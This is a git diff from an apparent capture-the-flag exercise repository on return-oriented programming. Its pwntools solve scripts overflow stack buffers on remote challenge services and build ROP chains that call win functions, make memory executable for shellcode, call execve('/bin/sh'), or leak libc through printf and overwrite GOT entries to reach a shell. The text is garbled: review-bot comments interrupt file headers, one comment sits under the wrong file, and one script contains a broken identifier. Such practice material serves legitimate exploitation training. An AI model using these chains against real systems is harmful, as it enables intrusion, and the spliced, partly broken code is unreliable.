+pop_rsi = 0x0000000000401208
+ret = 0x000000000040101A
+win = 0x000000000040121E
+print(p.recvuntil(b"[toolkit] Input: "))
+payload = flat(
+ b"A" * OFFSET,
+ p64(ret),
+ p64(pop_rdi),
+ p64(var1),
+ p64(pop_rsi),
+ p64(var2),
+ p64(pop_rdx),
+ p64(var3),
+ p64(win),
+)
+p.send(payload)
+p.send(b"\n")
+p.interactive()
diff --git a/rop/01_toolkit/toolkit b/rop/01_toolkit/toolkit
new file mode 100755
index 0000000..aecc375
Binary files /dev/null and b/rop/01_toolkit/toolkit differ
diff --git a/rop/02_forge/.gdb_history b/rop/02_forge/.gdb_history
new file mode 100644
index 0000000..af272ba
--- /dev/null
+++ b/rop/02_forge/.gdb_history
@@ -0,0 +1,7 @@
+disass vuln
+disass win
+disass vuln
+disass main
+disass shellcode
+r
+disass main
diff --git a/rop/02_forge/forge b/rop/02_forge/forge
new file mode 100755
index 0000000..66e0af8
Binary files /dev/null and b/rop/02_forge/forge differ
diff --git a/rop/02_forge/solve.py b/rop/02_forge/solve.py
new file mode 100644
index 0000000..ddadd06
--- /dev/null
+++ b/rop/02_forge/solve.py
@@ -0,0 +1,37 @@
+from pwn import *
+
+context.binary = elf = ELF("./forge", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13574)
+OFF_INPUT = 64
+ret = 0x000000000040101A
+pop_rdi = 0x00000000004011FB
+pop_rsi = 0x0000000000401204
+pop_rdx = 0x000000000040120D
+shellcode_addr = 0x0000000000404080
+MPROTECT_PLT = elf.plt["mprotect"]
+PROT = 0x7
+
+print(p.recvuntil(b"[forge] Send shellcode:\n"))
+shellcode = flat(asm(shellcraft.sh()))
+SHELLCODE_SIZE = 200
+p.send(shellcode)
+# p.send(b"A")
+# p.send(b"\n")
+print(p.recvuntil(b"[forge] Input:\n"))
+payload = flat(
+ b"A" * OFF_INPUT,
+ p64(ret),
+ p64(pop_rdi),
+ p64(shellcode_addr & 0xFFFFF000), # Must be page aligned
+ p64(pop_rsi),
+ 4096,
+ p64(pop_rdx),
+ p64(PROT),
+ # p64(ret),
+ p64(MPROTECT_PLT),
+ p64(shellcode_addr),
+)
+p.send(payload)
+# p.send(b"\n")
+p.interactive()
diff --git a/rop/03_chain_reactor/.gdb_history b/rop/03_chain_reactor/.gdb_history
new file mode 100644
index 0000000..7d8d849
--- /dev/null
+++ b/rop/03_chain_reactor/.gdb_history
@@ -0,0 +1,8 @@
+disass main
+disass vuln
+disass main
+b *0x000000000040132a
+r
+c
+disass win
+quit
diff --git a/rop/03_chain_reactor/chain_reactor b/rop/03_chain_reactor/chain_reactor
new file mode 100755
index 0000000..db36235
Binary files /dev/null and b/rop/03_chain_reactor/chain_reactor differ
diff --git a/rop/03_chain_reactor/solve.py b/rop/03_chain_reactor/solve.py
new file mode 100644
index 0000000..58d3da7
--- /dev/null
+++ b/rop/03_chain_reactor/solve.py
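Review bot: `SHELLCODE_SIZE = 200` is assigned and never read; either drop it or use it where the length matters. Inside flat(...) the page length is written as a bare `4096,` while every neighbouring entry is wrapped in p64(...); flat() packs the int according to `context.binary` so the result is the same, but the inconsistency makes the chain harder to audit, and `p64(4096),` matches the rest. The `PROT = 0x7` constant would read better as the intent it encodes, e.g. `PROT = 0x7  # PROT_READ | PROT_WRITE | PROT_EXEC`.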
@@ -0,0 +1,24 @@
+from pwn import *
+
+OFF = 64
+pop_rdi = 0x000000000040121F
+pop_rsi = 0x0000000000401221
+ret = 0x000000000040101A
+var1 = 0xC0FFEE
+var2 = 0xBADC0DE
+win = 0x0000000000401226
+context.binary = elf = ELF("./chain_reactor", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13510)
+print(p.recvuntil(b"[chain-reactor] Enter activation codes: "))
+payload = flat(
+ b"A" * 64,
+ p64(ret),
+ p64(pop_rd i),
+ p64(var1),
+ p64(pop_rsi),
+ p64(var2),
+ p64(win),
+)
+p.sendline(payload)
+p.interactive()
diff --git a/rop/04_arsenal/.gdb_history b/rop/04_arsenal/.gdb_history
new file mode 100644
index 0000000..edf57bb
--- /dev/null
+++ b/rop/04_arsenal/.gdb_history
@@ -0,0 +1,8 @@
+quit
+disass main
+disass vuln
+r
+disass vuln
+disass main
+vmmap
+quit
diff --git a/rop/04_arsenal/arsenal b/rop/04_arsenal/arsenal
new file mode 100755
index 0000000..9a97cc2
Binary files /dev/null and b/rop/04_arsenal/arsenal differ
diff --git a/rop/04_arsenal/solve.py b/rop/04_arsenal/solve.py
new file mode 100644
index 0000000..8385e20
--- /dev/null
+++ b/rop/04_arsenal/solve.py
@@ -0,0 +1,38 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./arsenal", checksec=False)
+shellstr = b"/bin/sh\x00"
+ret = 0x000000000040101A
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x0000000000401989 # Assign 59 (execve) to rax
+syscall = 0x0000000000401324
+WRITE_ADDR = 0x4AA000
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13594)
+print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))
+mov_qword_ptr_rdx_rax = 0x000000000040AB18 # mov qword ptr [rdx], rax; ret
+payload = flat(
+ b"A" * OFF,
+ p64(ret),
+ p64(pop_rdx),
+ p64(WRITE_ADDR),
+ p64(pop_rax),
+ shellstr,
+ p64(mov_qword_ptr_rdx_rax), # Write /bin/sh to a writable address in memory
+ p64(pop_rax),
+ p64(0x3B), # 59 is the execve syscall
+ p64(pop_rdi),
+ p64(
+ WRITE_ADDR
+ ), # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
+ p64(pop_rsi),
+ p64(0),
+ p64(pop_rdx),
+ p64(0),
+ p64(syscall),
+)
+p.sendline(payload)
+p.interactive()
diff --git a/rop/04_arsenal/test b/rop/04_arsenal/test
new file mode 100755
index 0000000..c53f454
Binary files /dev/null and b/rop/04_arsenal/test differ
diff --git a/rop/04_arsenal/test.c b/rop/04_arsenal/test.c
new file mode 100644
index 0000000..3b04bfb
--- /dev/null
+++ b/rop/04_arsenal/test.c
@@ -0,0 +1,6 @@
+#include
+#include
+int main(){
+ execve("/bin/sh",0,0);
+ return 0;
+}
diff --git a/rop/05_padlock/.gdb_history b/rop/05_padlock/.gdb_history
new file mode 100644
index 0000000..b63977f
--- /dev/null
+++ b/rop/05_padlock/.gdb_history
@@ -0,0 +1,44 @@
+disass main
+disass vuln
+r
+disass win
+vmmap
+disass main
+disass vuln
+disass main
+disass vuln
+got
+quit
+got
+r
+got
+b vuln
+r
+got
+n
+got
+n
+disass vuln
+b *0x401282
+c
+got
+b main
+r
+got
+r
+got
+find
+find %
+find x
+search "%x"
+search "[padlock]"
+R
+r
+search "[padlock]"
+got
+search "[padlock]"
+r
+got
+c
+got
+quit
diff --git a/rop/05_padlock/ld-linux-x86-64.so.2 b/rop/05_padlock/ld-linux-x86-64.so.2
new file mode 100755
index 0000000..64b6146
Binary files /dev/null and b/rop/05_padlock/ld-linux-x86-64.so.2 differ
diff --git a/rop/05_padlock/libc.so.6 b/rop/05_padlock/libc.so.6
new file mode 100644
index 0000000..c8b8655
Binary files /dev/null and b/rop/05_padlock/libc.so.6 differ
diff --git a/rop/05_padlock/padlock b/rop/05_padlock/padlock
new file mode 100755
index 0000000..53d251d
Binary files /dev/null and b/rop/05_padlock/padlock differ
diff --git a/rop/05_padlock/solve.py b/rop/05_padlock/solve.py
new file mode 100644
index 0000000..da9bd8d
--- /dev/null
+++ b/rop/05_padlock/solve.py
@@ -0,0 +1,68 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+# libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13582)
+PRINTF_PLT = elf.plt["printf"]
+ATOI_PLT = elf.plt["atoi"]
+PRINTF_GOT = elf.got["printf"]
+READ_GOT = elf.got["read"]
+MAIN = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF # format string
+pop_rsi = 0x0000000000401208 # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+mov_eax_pop_rbp = 0x4012B0
+mov_eax = 0x000000000040127D
+# Mi serve scrivere binsh da qualche parte
+# Mi serve trovare libc addr e chiamare system
+rw_addr = 0x405000
+# search it in libc
+BINSH = next(libc.search(b"/bin/sh\x00"))
+format_addr = 0x402028
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+payload = flat(
+ b"A" * OFF,
+ p64(ret),
+ # ATOI returns in rax, make it return 0 to set rax
+ p64(pop_rdi),
+ p64(format_addr),
+ p64(ATOI_PLT),
+ p64(pop_rdi),
+ # Since the GOT is a ptr I directly give it to printf to print the actual libc address
+ p64(PRINTF_GOT),
+ p64(ret),
+ p64(PRINTF_PLT),
+ p64(ret),
+ p64(MAIN),
+)
+p.send(payload)
+print(p.recvline())
+# print(p.recvline())
+leaked = p.recvline().strip().split(b"[")[0]
+leak_printf = u64(leaked.ljust(8, b"\x00"))
+print(f"Leaked addr:{hex(leak_printf)}")
+print(p.recvuntil(b"combination: "))
+libc.address = leak_printf - libc.symbols["printf"]
+
+BINSH = next(libc.search(b"/bin/sh\x00"))
+payload2 = flat(
+ b"A" * OFF,
+ # p64(ret),
+ p64(pop_rdi),
+ p64(BINSH),
+ p64(pop_rsi),
+ p64(0),
+ p64(pop_rdx),
+ p64(0),
+ # p64(ret),
+ p64(libc.symbols["execve"]),
+)
+print(f"Binsh: {hex(BINSH)} System: {hex(libc.symbols['execve'])}")
+p.sendline(payload2)
+p.interactive()
+# print(p.recvuntil(b"[padlock] Decimal combination: "))
diff --git a/rop/05_padlock/solve2.py b/rop/05_padlock/solve2.py
new file mode 100644
index 0000000..0ce037c
--- /dev/null
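Review bot: The first `BINSH = next(libc.search(b"/bin/sh\x00"))` (before `libc.address` is set) is dead: it is recomputed after the leak and the earlier value is never used, so the first line only misleads a reader into thinking the address is known up front. `READ_GOT`, `mov_eax_pop_rbp`, `mov_eax` and `rw_addr` are likewise assigned and never referenced; removing them, or parking them in a comment that says why they were considered, keeps the constants that matter visible. The two Italian comments (`# Mi serve ...`) are plan notes that predate the code below them and would be clearer as one English header comment describing the two-stage structure (leak via printf, then the libc-based chain). The f-string label `System:` prints `libc.symbols['execve']`, so the label and the value disagree.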
+++ b/rop/05_padlock/solve2.py
@@ -0,0 +1,44 @@
+from pwn import *
+
+OFF = 80
+context.binary = elf = ELF("./padlock", checksec=False)
+libc = ELF("/usr/lib/libc.so.6", checksec=False)
+libc = ELF("./libc.so.6", checksec=False)
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13543)
+
+add_what = elf.sym["add_what_where"]
+atoi_got = elf.got["atoi"]
+main = elf.sym["main"]
+
+pop_rdi = 0x00000000004011FF # format string
+pop_rsi = 0x0000000000401208 # got address
+pop_rdx = 0x0000000000401211
+ret = 0x000000000040101A
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+
+# populate got table
+first_run = flat(
+ b"A" * OFF,
+ p64(ret),
+ p64(main),
+)
+p.sendline(first_run)
+
+print(p.recvuntil(b"[padlock] Decimal combination: "))
+diff = libc.symbols["system"] - libc.symbols["atoi"]
+payload = flat(
+ b"A" * OFF,
+ p64(ret),
+ p64(pop_rdi),
+ p64(atoi_got),
+ p64(pop_rsi),
+ p64(diff),
+ p64(add_what),
+ p64(ret),
+ p64(main),
+)
+p.sendline(payload)
+p.sendline(b"/bin/sh")
+p.interactive()
diff --git a/rop/05_padlock/test b/rop/05_padlock/test
new file mode 100755
index 0000000..79c68d5
Binary files /dev/null and b/rop/05_padlock/test differ
diff --git a/rop/05_padlock/test.c b/rop/05_padlock/test.c
new file mode 100644
index 0000000..1817c52
--- /dev/null
+++ b/rop/05_padlock/test.c
@@ -0,0 +1,7 @@
+#include
+
+int main(){
+ int var1 = 5;
+ printf("Address: %d",&var1);
+ return 0;
+}
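Review bot: `libc = ELF("/usr/lib/libc.so.6", checksec=False)` is overwritten on the very next line by `libc = ELF("./libc.so.6", checksec=False)`, so the host libc is parsed for nothing and a reader cannot tell which one the offsets were taken from; delete the first line or comment it out as solve.py in the same directory does. `pop_rdx` is assigned and never used in either chain. The `# format string` / `# got address` comments on `pop_rdi` and `pop_rsi` were carried over from solve.py and no longer describe what these registers hold here (a GOT slot and a delta), so they should be updated or dropped.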
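Review bot: `printf("Address: %d",&var1);` passes an `int *` to a `%d` conversion, which is undefined behaviour and on x86-64 prints at most the low 32 bits of the pointer; the correct form is `printf("Address: %p\n", (void *)&var1);`. The single `#include` directive is shown without a header name; if that is not a capture artefact the file will not compile, since printf needs `<stdio.h>`. The same bare-`#include` rendering appears on the test.c in rop/04_arsenal, where `execve` is called with a null argv as well, which is accepted by Linux but not required by POSIX.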